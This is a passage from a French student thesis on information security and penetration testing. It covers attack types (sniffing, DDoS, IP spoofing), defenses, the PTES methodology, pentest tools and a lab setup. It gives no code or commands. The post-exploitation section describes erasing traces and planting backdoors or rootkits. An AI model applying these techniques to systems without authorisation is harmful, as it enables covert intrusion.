Un Sniffer est généralement utilisé pour intercepter les paquets qui circulent
sur un réseau. Il offre, à cet effet, la possibilité pour un hacker d’examiner le contenu
d’un certain nombre de paquets qui ne lui ont pas été initialement destinés. En tant

1
http://www.zdnet.fr/actualites/pour-google-le-phishing-reste-toujours-aussi-rentable-39859910.htm
2
https://www.lci.fr/high-tech/rgpd-2018-cnil-comment-preparer-votre-entreprise-aux-nouvelles-regles-sur-
les-donnees-personnelles-sous-peine-d-amende-2079322.html

16
CHAPITRE II: LA SECURITE INFORMATIQUE

que renifleur, cet outil peut donc intercepter tout type d’informations émises à travers
le réseau et par conséquent afficher à la fois l’identité des utilisateurs au même titre
que leurs mots de passe, surtout lorsque ces informations sont transférées par des
protocoles qui ne sont pas suffisamment sécurisés comme : le FTP (File Transfert
Protocol), la DNS (Domain Name System) ou encore le HTTP (Protocole de transfert
hypertexte). Lorsque les données ne sont donc pas cryptées et qu’elles doivent passer
à travers une interface réseau de l’ordinateur par l’intermédiaire duquel s’exécute le
renifleur réseau ou sniffer, les informations sont immédiatement interceptées par cette
machine sans la moindre difficulté. 1

Figure III - la fuite des données via "sniffing"2

d) Les attaques par Déni de Service DDOS ( Distributed Denial of Service


attack) : L’attaque DDos va consister à demander à ce bataillon corrompu de se
connecter ou d’envoyer des données en même temps vers une cible. Croulant sous les
demandes de connexion ou inondée par des Gigabit/s de données, cette cible devient en
quelques secondes inaccessible pour tous les internautes. Les pirates n’ont plus qu’à
demander une rançon à l’éditeur du site pour arrêter leur attaque ou en profitent pour
traverser une barrière de protection saturée plus capable d’agir.3

1
:http://www.anti-cybercriminalite.fr/article/le-sniffing-une-forme-dattaque-sur-le-r%C3%A9seau-
couramment-utilis%C3%A9e-par-les-pirates
2
https://securebox.comodo.com/ssl-sniffing/network-sniffing/
3
https://www.undernews.fr/hacking-hacktivisme/rapport-annuel-les-chiffres-des-attaques-ddos-en-france-en-
2017.html

17
CHAPITRE II: LA SECURITE INFORMATIQUE

Figure IV - Exemple de DDOS Attack

e) IP Spoofing : L’usurpation d’une adresse IP d’une machine est utilisé pour cacher sa
véritable identité, et donc de se faire passer pour quelqu’un autre, le plus souvent une
machine de confiance du réseau attaqué. Le principe de cette attaque consiste en la création
des paquets IP en modifiant l’adresse IP Source. Cependant, d’autres mécanismes doivent
être mis en place, sinon la réponse au paquet ne retournera pas à son émetteur, du fait de la
falsification de l’adresse IP. De ce fait la réponse est retournée à la machine "spoofée".
Cette technique peut être utile dans le cas d’authentification basée sur une adresse IP. Pour
ce faire, il existe des utilitaires qui permettent de modifier les paquets IP ou de créer ses
propres paquets tels que "hping2". Grâce à ces utilitaires, il est possible de spécifier une
adresse IP différente de celle que l’on possède, et ainsi se faire passer pour une autre
machine.1

1
https://www.oqlf.gouv.qc.ca/ressources/bibliotheque/dictionnaires/Internet/fiches/8370637.html

18
CHAPITRE II: LA SECURITE INFORMATIQUE

Figure V - IP adresse Spoofing1

II.5.Mécanismes de la sécurité
À cause des menaces provenant des logiciels malveillants, Il faut mettre en place
des mécanismes pour s’assurer la confidentialité, l’intégrité et la disponibilité des services.
Parmi ces mécanismes, on peut citer :
II.5.1Le Cryptage:
Le chiffrement est un procédé de cryptographie grâce auquel on souhaite rendre la
compréhension d'un document impossible à toute personne qui n'a pas la clé de
(dé)chiffrement. Ce principe est généralement lié au principe d'accès conditionnel. Bien
que le chiffrement puisse rendre secret le sens d'un document, d'autres techniques
cryptographiques sont nécessaires pour communiquer de façon sûre.2

Figure VI - Le Cryptage13

1
https://en.wikipedia.org/wiki/IP_address_spoofing
2
http://laurent.flaum.free.fr/pgpintrofr.htm

19
CHAPITRE II: LA SECURITE INFORMATIQUE

II.5.2.Le Pare-feu (Firewall):

Un pare-feu est un logiciel ou un matériel qui se charge d'établir une barrière entre
vous et le monde extérieur pour faire barrage aux pirates. Rappelons qu'un ordinateur
utilise des ports pour communiquer : par exemple, le port 80 est utilisé pour afficher des
pages web. Il y a plus de 65000 ports (65536 exactement), soit autant de portes d'entrée
dans votre ordinateur qu'un firewall se doit de protéger !
Un pare-feu peut vous permettre de "fermer" les ports et de cette manière, vous
rendre invulnérable (ou presque). Il peut aussi restreindre le trafic sortant et applique des
restrictions au trafic entrant.1

Le firewall protège l'ordinateur de cette manière :

Figure VII - le fonctionnement du


pare-feu2

II.5.3.L'Antivirus:
Les antivirus sont des logiciels conçus pour identifier, neutraliser et éliminer des
logiciels malveillants. Ceux-ci peuvent se baser sur l'exploitation de failles de sécurité,
mais il peut également s'agir de programmes modifiant ou supprimant des fichiers, que ce
soit des documents de l'utilisateur de l'ordinateur infecté, ou des fichiers nécessaires au bon
fonctionnement de l'ordinateur.
Un antivirus vérifie les fichiers et courriers électroniques, les secteurs de boot (pour
détecter les virus de boot), mais aussi la mémoire vive de l'ordinateur, les médias
amovibles (clefs USB, CD, DVD, etc.), les données qui transitent sur les éventuels
Réseaux (dont internet), etc.1
1
https://www.vulgarisation-informatique.com/firewall.php

20
CHAPITRE II: LA SECURITE INFORMATIQUE

II.5.4.VPN:
Dans les réseaux informatiques, le réseau privé virtuel (Virtual Private Network en
anglais, abrégé en VPN) est une technique permettant aux postes distants de communiquer
de manière sûre, tout en empruntant des infrastructures publiques (internet). Un VPN
repose sur un protocole, appelé protocole de tunnellisation, c'est-à-dire un protocole
permettant aux données passant d'une extrémité à l'autre du VPN d'être sécurisées par des
algorithmes de cryptographie.2

Figure VIII - le fonctionnement du pare-feu ²

II.5.5.IDS « Intrusion Detection System »:


C'est un ensemble de composants logiciels et matériels dont la fonction principale est
de détecter et d’analyser toute tentative d’affection (volontaire ou non).Généralement
utilisés dans un environnement décentralisé, ils permettent de réunir les informations de
diverses sondes placées sur le réseau.19.

II.6.Audit de sécurité :

Un audit de sécurité a pour objectif principal l’évaluation des risques associés aux
activités informatiques, il permet également de s’assurer de l’adéquation du système
informatique aux besoins de l’entreprise et de valider que le niveau de services est adapté
aux activités de celles-ci. Un audit de sécurité est un diagnostic et un état des lieux
extrêmement fin du système informatique de l’entreprise. Il est réalisé afin de définir des
axes d’amélioration et d’obtenir des recommandations pour pallier aux faiblesses
constatées.3

1
Vincent Erceau & Romain Colombier, « GMSI Informatique », Projet SAS, 2011.
2
https://master-vpn.fr/definition-vpn.html
3
https://rno-its.piarc.org/en?option=com_content&task=view&id=42&Itemid=71&lang=fr

21
CHAPITRE II: LA SECURITE INFORMATIQUE

Figure IX - le Système de détection d'intrusion1

II.7.Conclusion

Le proverbe dit : « Mieux vaut prévenir que guérir. » Au terme du parcours des
divers aspects de la sécurité des systèmes d’information, nous pouvons dire qu’en ce
domaine prévenir est impératif, parce que guérir est impossible et de toute façon ne sert à
rien. Lorsqu’un accident ou un pirate a détruit les données de l’entreprise et que celle-ci
n’a ni sauvegarde ni site de secours, elle est condamnée, tout simplement : les personnels
de ses usines ne savent plus quoi produire ni à quels clients livrer quoi, ses comptables ne
peuvent plus encaisser les factures ni payer le personnels et débiteurs, ses commerciaux
n’ont plus de fichier de prospects.

Dans le prochain chapitre nous allons présenter le test d’intrusion et ces outils pour
le réaliser.

1
https://pratum.com/blog/262-why-intrusion-detection-and-prevention-systems-are-still-important

22
CHAPITRE III: LE TEST D'INTRUSION

III.1.Introduction

Au début des années 1970, le département de la Défense des États-Unis a utilisé pour
la première fois des tests d’intrusion pour démontrer les failles de sécurité dans un système
informatique. Dans un effort pour combattre les attaquants et les autres intrus causer des
failles de sécurité dans leur réseau afin que les failles de sécurité puissent être résolues avant
qu'ils ne soient exposés1. La première référence ouverte publiée aux tests d’intrusion est un
article de Richard Linde2. C'était au début des années 1990, le terme «PenetrationTesting» et
la technique utilisée pour les tests ont été établies en 1995 lorsque le scanner de vulnérabilité
basé sur Unix SATAN a été introduit3.La pratique des tests d’intrusion a commencé à
recevoir une attention répandue au sein de la communauté Internet avec la publication d'un
projet de logiciel de recherche des étudiants de « Georgia Institute of Technology »,
« Internet Security Scanner », ainsi qu'un article sur le sujet. Ces derniers jours, des tests
d’intrusion, ou « Ethical Hacking », a évolué en tant que l'art et la science qui repose sur une
méthodologie éprouvée et tirer parti d'une variété d'outils de pointe pour identifier
systématiquement les risques de sécurité du système d'information informatique.4

III.2.Définition du test d’intrusion


Les tests d’intrusion sont l'activité réalisée par un testeur d’intrusion (PenTester) ou
l'auditeur. Un groupe de nombreux testeurs est appelé « Tiger Team ». Techniquement, un
test d’intrusion est un sondage systémique basé sur la sécurité du système de «l'intérieur» ou
de «l'extérieur» pour rechercher les vulnérabilités qu'un attaquant pourrait exploiter. Un
système peut être n'importe quelle combinaison d'application, d'hôte ou de réseau. En d'autres
termes, il s'agit d'évaluer tous les composants de l'infrastructure informatique, Y compris les
systèmes d'exploitation, le support de communication, les applications, les périphériques
réseau, la sécurité physique et la psychologie humaine. Utilisant des méthodes similaires ou
identiques à celles d'un attaquant mais exécutées par les professionnels de l'informatique
autorisés et qualifiés.5
Le test d’intrusion peut être défini comme la «simulation d'une attaque réelle contre
un réseau ou une application cible, englobant un large éventail d'activités et de variations».

1
https://searchnetworking.techtarget.com/tutorial/Network-penetration-testing-guide
2
Richard R. Linde. "operating system penetration". In Proceedings of the May 19-22, 1975, national computer
conference and exposition, AFIPS '75, pages 361-368, New York, NY, USA, 1975. ACM
3
http://www.porcupine.org/satan
4
http://www.fish2.com/security/admin-guide-to-cracking.html
5
https://searchsoftwarequality.techtarget.com/definition/penetration-testing

23
CHAPITRE III: LE TEST D'INTRUSION

Les variations comprennent la simulation d'une menace interne par opposition à un attaquant
externe, en faisant varier la quantité d'informations cible fournies avant le test.
Un exemple simple de test d’intrusion consiste à utiliser le moteur de recherche
«Google». Pour découvrir des informations préliminaires sur la cible en utilisant des
directives telles que "site:target.com”, trouver les contacts et l'adresse e-mail des employés,
tracer les réseaux et plus. De même, lorsqu'un bug est détecté dans une autre application web
populaire, Google peut souvent fournir une liste de serveurs vulnérables dans le monde
entier, donnant des informations à un attaquant bien formé.1
Le test d’intrusion est une étape critique dans le développement de tout système
sécurisé car il ne fait pas que souligner l'opération, mais la mise en œuvre et la conception
d'un système. C'est un acte autorisé et programmé qui sépare un testeur d’intrusion d'un
attaquant et qui a été largement adopté par les organisations et les institutions. Par exemple,
un test d’intrusion simple peut impliquer l'analyse d'une adresse IP pour identifier les hôtes
qui offrent des services avec des vulnérabilités connues ou même des vulnérabilités
exploitables qui existent dans un système d'exploitation non corrigé. Les résultats de ces tests
sont ensuite documentés et soumis en tant que rapport et les vulnérabilités identifiées peuvent
alors être résolues. Il effectue un test approfondi et systématique en analysant les systèmes
pour détecter les failles de sécurité et en fournissant des informations précieuses pour
cartographier clairement les problèmes de sécurité avec des outils manuels ou automatisés.
Tout au long de la période de tests d’intrusion, la prise de conscience de la direction et le
personnel d'une organisation est importante, car ces tests peuvent parfois avoir des
conséquences graves telles que la congestion se briser et réseau système résultant de la panne
des équipements du système ou Dans le pire des cas, il peut résulter exactement la chose
qu'il vise à prévenir.2
III.3.Objectifs du test d’intrusion
Le test d’intrusion offre une vue d'ensemble sur la posture de sécurité actuelle de
l'infrastructure informatique d'une organisation. L'objectif d'un test d’intrusion est de
déterminer la faisabilité d'une attaque et son impact sur un exploit réussi s'il est découvert. Le
processus implique une analyse active du système pour toutes les vulnérabilités potentielles
pouvant résulter d'une mauvaise configuration du système, de failles matérielles ou
logicielles connues et / ou inconnues, ou de faiblesses opérationnelles dans les contre-

1
M. Bishop. "about penetration testing.". IEEE Security & Privacy, pages 84-87, 2007
2
“Technical Guide to Information Security Testing and Assessment” by Karen Scarfone
(NIST)https://csrc.nist.gov/publications/detail/sp/800-115/final

24
CHAPITRE III: LE TEST D'INTRUSION

mesures techniques ou de processus. Il aide à réduire les risques de sécurité et de confirmer si


les mesures de sécurité actuelles mises en œuvre sont efficaces ou non. Certaines des autres
principales raisons d'adopter des tests d’intrusion sont énumérées ci-dessous1:

 Fournir un bon point de départ : Un test d’intrusion constitue un bon premier pas
pour comprendre la position de sécurité actuelle d'une organisation en identifiant les
défauts et les failles de sécurité, et indique où appliquer les technologies et les
services de sécurité pour que l'organisation puisse déployer un plan d'action pour
atténuer les menaces d'attaque ou d'abus.2
 Identifier et hiérarchiser les risques de sécurité : L'utilisation des tests d’intrusion
aide non seulement à comprendre le risque de sécurité, mais il aide aussi à prioriser
les questions de risque, ainsi qu'une évaluation de leur impact et souvent avec une
proposition d’atténuation. Le risque identifié lors des tests peut être hiérarchisé en
fonction de la gravité. En outre, ces efforts peuvent conduire à une allocation
budgétaire efficace pour les problèmes de sécurité de l'information.2
 Améliorer la sécurité du système informatique : Les tests d’intrusions sont
effectués dans le but d'améliorer la sécurité des systèmes informatiques tels que les
pare-feu, les routeurs et les serveurs. Différents mécanismes de sécurité tels que l'IDS,
le pare-feu et la cryptographie sont utilisés pour protéger les données. Cependant, la
fréquence et la sévérité de l'intrusion réseau, le vol de données et les attaques causées
par le code malveillant, les pirates informatiques, les employés mécontents continuent
d'augmenter avec les risques et les coûts associés aux failles de sécurité réseau et au
vol de données. Les tests d’intrusion aident à résoudre ces problèmes. Par exemple,
pour trouver des ports ouverts inutiles ou des versions vulnérables d'applications Web
et de systèmes d'exploitation.2
 Améliorer la sécurité d'une infrastructure organisationnelle globale : En dehors
de tester l'infrastructure technique, un test d’intrusion peut également tester la gestion
et l'infrastructure des employés, pour surveiller les procédures d'escalade, par exemple
en augmentant pas à pas la portée et / ou l'agressivité des tests. Les techniques
d'ingénierie sociale, telles que la demande de mots de passe par téléphone, peuvent

1
“Development of penetration testing model for increasing network security” , RahmatBudiarto
2
"literature study of penetration testing", Michelle Fiocca. http://www.ida.liu.se/

25
CHAPITRE III: LE TEST D'INTRUSION

être utilisées pour évaluer le niveau de sensibilisation à la sécurité générale et


l'efficacité des politiques de sécurité et des accords d'utilisation.1
 Effectuer une vérification diligente et des vérifications indépendantes : Une
analyse de sécurité impartiale et test d’intrusion peuvent concentrer les ressources
internes de sécurité où ils sont le plus nécessaires. En outre, un audit de sécurité
indépendant apporte la preuve d'une diligence raisonnable dans un contexte légal de
protection des actifs en ligne, minimisant ainsi la perte potentielle de valeur pour les
actionnaires. Ces audits indépendants deviennent rapidement une exigence pour
l'obtention d'une assurance de cyber sécurité.2
 Réduire les pertes financières : Une fois les risques et les infrastructures de sécurité
sont en place, le test d’intrusion fournit une rétroaction de validation critique entre les
initiatives d'affaires et un cadre de sécurité qui permet d'atténuer les pertes financières
et la mise en œuvre réussie du risque minimal.2

III.4.Types de test d’intrusion


Bien qu'il existe différents types de tests d’intrusion, les tests d’intrusion dépendent
normalement de ce qu'une organisation veut tester, qu'il s'agisse de simuler une attaque par
une source externe. Les deux approches largement acceptées « Black-Box » et « White-
Box ». La principale différence entre deux approches est la quantité de connaissances sur les
détails d'implémentation fournis au testeur sur les systèmes à tester
a) Test de type boîte noir(Black-box testing)
Le Black-box testing est également appelé "test externe" ou "test d’intrusion à
distance". Dans cette approche, les testeurs simulent une attaque en tant que personne n'ayant
aucune connaissance préalable de l'infrastructure à tester en déployant le nombre de
techniques d'attaque réelles (par exemple, ingénierie sociale, analyse de réseau, accès à
distance, chevaux de Troie, etc.) et en suivant les phases de test organisées. Par exemple, les
testeurs seront uniquement fournis avec le site ou l'adresse IP du réseau de l'organisation. Par
conséquent, les testeurs simulent toutes les techniques de piratage qui peuvent révéler des
vulnérabilités connues et inconnues sur le réseau. L'objectif principal du Black-box testing est

1
“a penetration testing model”,Germany Federal Office for Information Security BSI,
https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Studies/Penetration/penetration_pdf.pdf?
__blob=publicationFile&v=1
2
“penetration tests; recommendations for performing more secure tests”: https://www.blackhat.com/docs/us-
17/wednesday/us-17-McGrew-Protecting-Pentests-Recommendations-For-Performing-More-Secure-Tests-
wp.pdf

26
CHAPITRE III: LE TEST D'INTRUSION

de vérifier l'intégrité du réseau d'une organisation et de réduire de manière proactive les


risques d'attaques externes et internes.1

b) Test de type boîte blanche( White-box testing)


Le White-box testing est également appelé «test interne». Dans cette approche, les
testeurs simulent une attaque en tant que personne ayant une connaissance complète de
l'infrastructure à tester, incluant souvent les détails du système d'exploitation, le schéma
d'adresse IP et les configurations réseau, le code source et éventuellement même certains
mots de passe. Par exemple, le testeur essaie de configurer un «backdoor» qui pourrait être
utilisé pour obtenir un accès à distance une fois que la sécurité interne a été violée. L'objectif
principal du White-box testing est de vérifier l'intégrité du réseau des organisations et de
réduire proactivement les risques d'un individu interne comme un employé mécontent.1
c) Test de type boîte grise(Gray-box Testing)
La combinaison des deux types de tests d’intrusion donne un aperçu puissant du point
de vue de la sécurité intérieure et extérieure. Cette combinaison est connue sous le nom de
Gray-box testing. Dans cette approche, les testeurs ont des connaissances et sont placés dans
une position privilégiée. C'est une méthode privilégiée lorsque le coût est un facteur car cela
permet à l'équipe de test d’intrusion de gagner du temps pour découvrir des informations
accessibles au public.1

Figure III - I – La différence entre les types de test d’intrusion

1
https://www.nbs-system.com/blog/tests-en-boite-noire-grise-ou-blanche-quelles-differences/

27
CHAPITRE III: LE TEST D'INTRUSION

III.5. Méthodologie du test d’intrusion


Pour effectuer le test d’intrusion sur l'environnement de production était tentant, mais
l'apprentissage et la compréhension du test d’intrusion contre le système de production
pourrait être risqué. Cela impliquait des systèmes de production, toute erreur commise aurait
causé des pertes financières et endommagé la fonctionnalité globale d'un système ou d'un
réseau.
Plusieurs méthodes ont été conçues pour réaliser un test d’intrusion mais la plus
connue est la méthode PTES (Penetration Testing Execution Standard) qu’on va suivre dans
notre travail.
III.5.1.Définition du standard PTES
Le PTES est un standard adopté par d’éminents représentants du monde de la sécurité
informatique créé en 2009. Il a pour but d’offrir aux entreprises ou pentesters, une
méthodologie de conduite d’un test d’intrusion en se basant sur 7 phases .

a) Phase01 : pré-engagement
Dans cette phase, l’entreprise qui souhaite mener des tests sur son système
d’information, réseau et sur ses application, définit avec le pentester (ou l’entreprise
en charge de réaliser le test d’intrusion) un contrat. Ce contrat délimite le pé rimètre du
test d’intrusion qui va être réalisé, ce que le pentester a doit de faire et ce qu’il n’a pas
droit de faire, ainsi que les objectifs.
C’est une phase très importante car elle définit le cadre légal du contrat, les
limites à ne pas franchir et les objectifs du test d’intrusion.
Donc c’est un engagement écrit entre les deux parties qui contiendra tous les points
nécessaires pour la bonne conduite du test d’intrusion sans nuire aux intérêts de
chaque parti.
Le pentester étant amené à se comporter comme un attaquant et à exploiter les
failles découvertes, il est important de définir les limites à ne pas franchir pour ne pas
par exemple exposer les données sensibles et personnelles de l’entreprise.
Il peut se passer beaucoup de choses inattendues lors d’un pentest. Par exemple, un
système ou une application peut ne plus fonctionner après un test d’intrusion. Pour
une entreprise, une application interne vitale ou un service qui ne fonctionne plus peut
avoir des répercussions importantes sur le business. 1

1
: https://www.supinfo.com/articles/single/4459-penstest-test-intrusion-qu-est-ce-que-c-est-comment-ca-se-
passe

28
CHAPITRE III: LE TEST D'INTRUSION

De ce fait, il faut bien définir le contrat sur les points suivants :


 Comprendre le besoin et le résultat attendu par le client
 Les objectifs du test d’intrusion
 Le périmètre concerné par le test d’intrusion, les services, les technos etc…
 La durée du test.
 Ce qu’il faut faire en cas de découvertes de vulnérabilités. Faut -il les exploiter
ou non, autrement dit les limites à ne pas franchir
 Autorisation d’accéder à des applications ou données sensibles.
Pour le pentester, ce contrat lui permettra de se protéger de manière légale mais aussi
de connaitre les contours du test à mener.
Ainsi le pentester peut bien conduire son travail en gardant en tête les engagements
vis-à-vis de l’entreprise. 1

b) Phase 02 : Collecte d’informations / renseignements (Intelligence gathering)


Ici, on va chercher à lister un maximum d’informations à propos du SI testé, et cela
via plusieurs méthodes. L’objectif est donc de dresser une cartographie de la surface
d’attaque depuis la position de départ de l’attaque, d’obtenir des renseignements sur les
services, serveurs et éléments actifs utilisés, mais également leur version et les systèmes de
sécurité en place (VPN, Firewall, Anti-Ddos, DMZ, etc.). La partie Intelligence Gathering
peut se faire de manière passive (sans interaction directe avec le SI de la cible) et/ou de
manière active (en allant communiquer avec les serveurs ciblés).2
On peut recueillir des informations en utilisant :
 Des moteurs de recherches et notamment Google. Dans le cas de l’utilisation de
Google, on parle de Google Hacking qui est souvent une mine d’informations.
Le tout est de savoir s’y prendre et d’utiliser les recherches avancées qu’offre
le moteur de recherche Google.
 Les réseaux sociaux peuvent aussi être très utililes et nous fournir des
informations capitales dans le cadre du social engineering ( exploitation des
failles dues au comportement humain).

1
: https://www.supinfo.com/articles/single/4459-penstest-test-intrusion-qu-est-ce-que-c-est-comment-ca-se-
passe
2
: https://www.information-security.fr/test-dintrusion-pentest-presentation-methodologies/

29
CHAPITRE III: LE TEST D'INTRUSION

 Des outils DNS comme dig, nslookup qui peuvent permettre de récupérer des
IPs et d’établir un profil géographique. 1
 On peut aussi faire du scan passif pour détecter des services, les systèmes de
protection mais surtout pour voir les ports ouverts.

c) Phase 03 : Le Threat Modeling


Dans cette phase, on va chercher à comprendre le contexte de l’entreprise et les
menaces auxquelles elle est exposée, ce qui permettra de déterminer une méthodologie
d’attaque efficace.
Une entreprise dans le secteur agroalimentaire aura un contexte et des risques
différents qu’une autre évoluant dans le secret bancaire. La première aura plus
tendance à protéger ses secrets de fabrication alors que le deuxième sera plus
préoccupé à protéger les informations personnelles et bancaires de ses clients.
Pour mener à bien cette phase, on utilisera les informations recueillies lors de
la phase de collecte pour analyser les menaces et ainsi déterminer la méthode
d’attaque la plus appropriée par rapport au contexte de l’entreprise.
Cette phase doit être bien menée car le pentester ne peut pas se permettre de tester des
attaques ou des méthodes aléatoires pour une question d’efficacité et de temps. 2

d) Phase 04 : Analyse et évaluation des vulnérabilités

On va ici se servir des informations collectées précédemment pour analyser les


systèmes, le personnel et les processus en place afin de rechercher des failles de sécurité et de
vulnérabilités exploitables. Cela passe donc par un processus de recherche, manuelle et/ou
automatique des vulnérabilités, l’objectif est ici de dresser une liste de ce qui pourrait être
exploitable et de construire un “arbre d’attaque” , c’est à dire une suite d’attaque pouvant
amener à la découverte d’autres vulnérabilités, traçant un chemin vers la prise de contrôle du
SI ou la possibilité d’établir des actes d’espionnage ou de sabotage. Cette phase passe
systématiquement par de la recherche sur les bases d’exploits publiques, la vérification des
patchs des systèmes scannés et l’utilisation d’outils de scans.3

1
: https://www.supinfo.com/articles/single/4459-penstest-test-intrusion-qu-est-ce-que-c-est-comment-ca-se-
passe
2
: https://www.supinfo.com/articles/single/4459-penstest-test-intrusion-qu-est-ce-que-c-est-comment-ca-se-
passe
3
https://www.information-security.fr/test-dintrusion-pentest-presentation-methodologies/

30
CHAPITRE III: LE TEST D'INTRUSION

e) Phase 05 : La phase d’exploitation.


C’est dans cette phase en général que le pentester ressent la consécration de son
travail des phases précédentes.
Une fois qu’il aura dressé une liste des vulnérabilités dans la phase précédente,
le pentester commencera à les exploiter pour prendre le contrôle des applications ou
du système d’information.
Dans cette phase, il essayera d’aller le plus loin possible, de prendre le contrôle
avec des droits administrateurs et essayer de récupérer les données sensibles de
l’entreprise tout en respectant ce qui a été défini dans le contrat de pré -engagement.
Là aussi le pentester se doit être rigoureux et minutieux pour exploiter les
vulnérabilités avec la manière la plus adaptée.

f) Phase 06 : Post-Exploitation
Cette phase suit directement la phase d’exploitation comme son l’indique.
A cette étape, le pentester après s’être introduit ou pris le contrôle du système
d’information ou des applications, cherchera à effacer ses traces pour ne pas éveiller
de soupçons auprès des administrateurs systèmes ou les personnes garantes de la
sécurité du système d’information.
Comme le ferait en attaquant qui compromet le système d’information, il laissera des
backdoors ou portes dérobées en implémentant des malwares ou rootkit qui lui
permettront d’avoir un contrôle pérenne.

g) Phase 07 : Reporting
C’est la partie la plus importante de tout test d’intrusion. Car il s’agit dans
cette partie le pentester doit fournir un rapport sous forme de documentation qui
explique, ce qu’il a fait, comment il l’a fait et plus important comment l’entreprise
pourrait s’e servir pour corriger les failles découvertes.
Le pentester agissant comme un attaquant se doit de fournir ce rapport qui peut être
divisé en plusieurs :
 Un rapport sur les failles découvertes et comment les utiliser pour mitiger et
améliorer la sécurité du système d’information.

31
CHAPITRE III: LE TEST D'INTRUSION

 Un rapport technique qui détaille techniquement les failles, leurs exploitations


et comment les corriger. 1

III.6.Logiciels de test d’intrusion

a) Kali Linux
Kali Linux est une distribution Linux basée sur Debian, son but principal est d’aider les
professionnels travaillant dans la sécurité informatique afin de pouvoir réaliser des tests
d’intrusion avancés ainsi que des audits de sécurité. Kali Linux contient plusieurs centaines
d’outils orientés pour différentes tâches de sécurité informatique, tel que les tests d’intrusion,
la recherche en sécurité, le Forensics et l’ingénierie inversé. Kali Linux est développé, fondé
et maintenu par la société leader en formations et entrainements en sécurité informatique,
Offensive Security.2

b) Wireshark
Wireshark est un analyseur de paquets libre utilisé dans le dépannage et l'analyse de
réseaux informatiques, le développement de protocoles, l'éducation et la rétro-ingénierie. Son
appellation d'origine (Ethereal) est modifiée en mai 2006 pour des questions relatives au droit
des marques. Wireshark utilise la bibliothèques logicielles GTK+ pour l'implémentation de
son interface utilisateur et pcap pour la capture des paquets; il fonctionne sur de nombreux
environnements compatibles UNIX comme GNU/Linux, FreeBSD, NetBSD, OpenBSD ou
Mac OSX, mais également sur Microsoft Windows.3
c) Cain & Abel
Cain and Abel est un logiciel gratuit et en anglais qui vous permettra de récupérer des
identifiants et des mots de passe en analysant votre réseau et vos postes de travail. Il est
principalement utilisé pour vérifier si un réseau et des stations sont suffisamment robustes
pour résister à diverses attaques. Via une analyse des paquets, cet outil offre la possibilité de
rechercher par dictionnaire, par bruteforce ou par rainbow table des clés de cryptage de
réseaux Wifi, des mots de passes masqués ainsi que des conversations IP. Il se propose aussi
de sniffer les sessions HTTPS, SSH, telnet, POP3, IMAP et les adresses MAC.4

1
: https://www.supinfo.com/articles/single/4459-penstest-test-intrusion-qu-est-ce-que-c-est-comment-ca-se-
passe
2
https://www.supinfo.com/articles/single/5854-qu-est-ce-que-kali-linux
3
http://dictionnaire.sensagent.leparisien.fr/Wireshark/fr-fr/
4
https://www.clubic.com/telecharger-fiche51284-cain-and-abel.html

32
CHAPITRE III: LE TEST D'INTRUSION

d) Fuzzbunch
Fuzzbunch est utilitaire de test d’intrusion utilisé par le département de la Défense des
États-Unis NSA, il vous permet de lancer des exploits et d'interagir avec différents implants.
Le Fuzzbunch est ce que Metasploit est aux pentesters. Mais, il est créé en langage de
programmation.1
e) Nmap
Nmap (« Network Mapper ») est un outil open source d'exploration réseau et d'audit
de sécurité. Il a été conçu pour rapidement scanner de grands réseaux, mais il fonctionne
aussi très bien sur une cible unique. Nmap est généralement utilisé pour les audits de sécurité
mais de nombreux gestionnaires des systèmes et de réseau l'apprécient pour des tâches de
routine comme les inventaires de réseau, la gestion des mises à jour planifiées ou la
surveillance des hôtes et des services actifs.2
f) Metasploit-Framework
Metasploit est un projet open source écrit en langage ruby qui fournit une ressource
publique pour la recherche des failles de sécurité et développement d'un code permettant à un
administrateur réseau de pénétrer son propre réseau pour identifier les risques de sécurité et
documenter quelles vulnérabilités doivent être traitées en premier.3

III.7.Conclusion
Dans ce chapitre, nous avons pris connaissance des notions de base de test d’intrusion
(Pentest) et aussi, on a cité quelques logiciels utilisés par les experts de sécurité, nous avons
par la suite définis l’environnement de notre travail pour mettre en place notre solution de
sécurité.

1
http://pentestit.com/install-fuzzbunch-danderspritz/
2
https://nmap.org/man/fr/
3
https://whatis.techtarget.com/definition/Metasploit-Project-Metasploit-Framework

33
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

IV.1.Présentation de l’environnement de travail

Normalement notre travail sera réalisé au niveau de la C.N.R mais vu que nous sommes
des stagiaires et non pas des experts et vue l’importance des données le responsable a refusé de
faire notre pratique au niveau de la C.N.R.

On a utilisé deux ordinateurs portables pour créer l'environnement de test d’intrusion. Les
deux ordinateurs portables ont été connectés via un réseau WIFI avec des adresses IP
dynamiques utilisant le serveur DHCP. Les deux ordinateurs portables avaient un système
d'exploitation installé sur eux. Un ordinateur portable, a été utilisé pour mener test d’intrusion,
avait UBUNTU 18,04 installé. , et l’autre avait Windows 10 Enterprise installé servi de machine
cible tout au long du test.

La machine cible simulé un environnement informatique en réseau, mais le concept de


défense en profondeur était en considération. Cela signifiait qu'aucun mécanisme de défense, tel
que des pare-feu et des systèmes de détection d'intrusion, n'était installé sur la cible.
Machines. Cette considération était intentionnelle car l'inclusion du mécanisme de défense aurait
eu une incidence sur l'objectif réel derrière cette configuration et l'exploitation d'un système ou
d'un réseau était souvent plus facile sans pare-feu et IDS / IPS.
 Caractéristiques du matériel utilisé
 La Machine de Pentest
 Processor: Intel core i5 M 560 @ 2.67GHz
 RAM: 4 GB
 Disque dur : 1 TB
 La machine cible
 Processor: Intel core i5-3210M @ 2.50GHz
 RAM: 6 GB
 Disque dur: 700 GB

34
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

IV.2.Outils de travail
IV.2.1.système d’exploitation
Pour une meilleure sécurité, nous avons préféré de travailler dans un environnement
Linux, qui est considéré comme le noyau le plus sûr au monde, plus précisément nous avons
choisis la distribution Ubuntu 18.04.1 LTS car il nous fournit un espace de travail unique et nous
assure une fiabilité de résultat incomparable.
Pour pouvoir installer Ubuntu sur le disque système, il faut lui faire de la place. Au
minimum, Ubuntu recommande d’allouer 15 Go d’espace disque. Pour plus de confort, il est
recommandé d’allouer 25 Go, ça sera amplement suffisant.

Figure IV - I - UBUNTU 18.04 LTS

 Etapes d’installation d’Ubuntu 18.04 LTS


 Insérez le périphérique d’installation d’Ubuntu 18.04 LTS (clé USB, CD ,
DVD…)sur le PC.
 Redémarrez le PC et bootez sur le périphérique d’installation d’Ubuntu 18.04 LTS.

35
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

Figure IV - II - La liste GRUB Loader


